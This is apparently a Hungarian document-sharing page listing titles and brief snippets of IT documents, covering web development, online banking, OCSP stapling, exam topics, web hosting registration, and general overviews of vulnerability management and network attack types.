Web-fejlesztés NGM_IN002_1 Rich Internet Applications RIA Vékony-kliens generált (statikus) HTML megjelenítése szerver oldali feldolgozással szinkron oldal megjelenítéssel RIA desktop alkalmazások funkcionalitása
2. Számlainformációk (a kiválasztott számlához kapcsolódó lekérdezések)
A DigiBank alkalmazás funkciói lehetõvé teszik a banki ügyfelek számára, hogy a számláikról, illetve egyéb banki tevékenységükrõl, az interneten keresztül a világháló bármely pontján aktuális információkat
Az Internet felépítése
Digitális kapcsolattartás Az Internet felépítése Az Internet egy világméretű számítógépes hálózat sok összekapcsolt számítógépet tartalmaz a számítógépek egyenrangúak, nincs központi számítógép nincs központja,
OCSP Stapling. Az SSL kapcsolatok sebességének növelése Apache, IIS és NginX szerverek esetén 1(10)
OCSP Stapling Az SSL kapcsolatok sebességének növelése Apache, IIS és NginX szerverek esetén 1(10) 1. Tartalomjegyzék 1. Tartalomjegyzék... 2 2. Bevezető... 3 3. OCSP Stapling támogatással rendelkező webszerverek...
SZÓBELI ÉRETTSÉGI TÉMAKÖRÖK
INFORMATIKA SZÓBELI ÉRETTSÉGI TÉMAKÖRÖK Az emelt szint a középszint követelményeit magában foglalja, de azokat magasabb szinten kéri számon. 1. Információs társadalom 2. Informatikai alapismeretek - hardver
Webtárhely létrehozása a WWW.freeweb.hu helyen. Lépések Teendő 1. Böngészőbe beírni: www.freeweb.hu. 2. Jobb oldalon regisztrálni (tárhelyigénylés).
Lépések Teendő 1. Böngészőbe beírni: www.freeweb.hu Kép 2. Jobb oldalon regisztrálni (tárhelyigénylés). 3. 4. Értelemszerűen kitölteni a regisztrációs lapot, és elküldeni. 5. Postafiókomra érkező levélben
Sérülékenység kezelés. Komli József project manager PTA CERT-Hungary Központ
Sérülékenység kezelés Komli József project manager PTA CERT-Hungary Központ 1 A biztonságérzet a veszély érzékelésének hiánya 2 Mi a sérülékenység? Sérülékenység: Az IT biztonság területén a sérülékenység
Tartalom. I. Rész A számítógép megosztása 5. Bevezetés 1. 1 n Saját profilt mindenkinek 7. Biztonsági programok 3 A könyvben használt jelek 4
Bevezetés 1 A könyv felépítése 2 Biztonsági programok 3 A könyvben használt jelek 4 I. Rész A számítógép megosztása 5 1 n Saját profilt mindenkinek 7 Alapfogalmak 8 Hogyan mûködik? 8 Biztonság 9 Felhasználói
Információbiztonsági kihívások. Horváth Tamás & Dellei László 2010. 11. 23.
Információbiztonsági kihívások Horváth Tamás & Dellei László 2010. 11. 23. Bemutatkozás Miről lesz szó Aktualitások, veszélyek az IT biztonság területén Megoldások Elő bemutató WIFI Hack Nádor Rendszerház
IT hálózat biztonság. Hálózati támadások
5. Hálózati támadások Támadások típusai: Emberek manipulációja (social engineering) Fizikai támadás Hardveres támadás Szoftveres támadás illetve ezek tetszőleges kombinációja 2 A biztonsági tevékenységek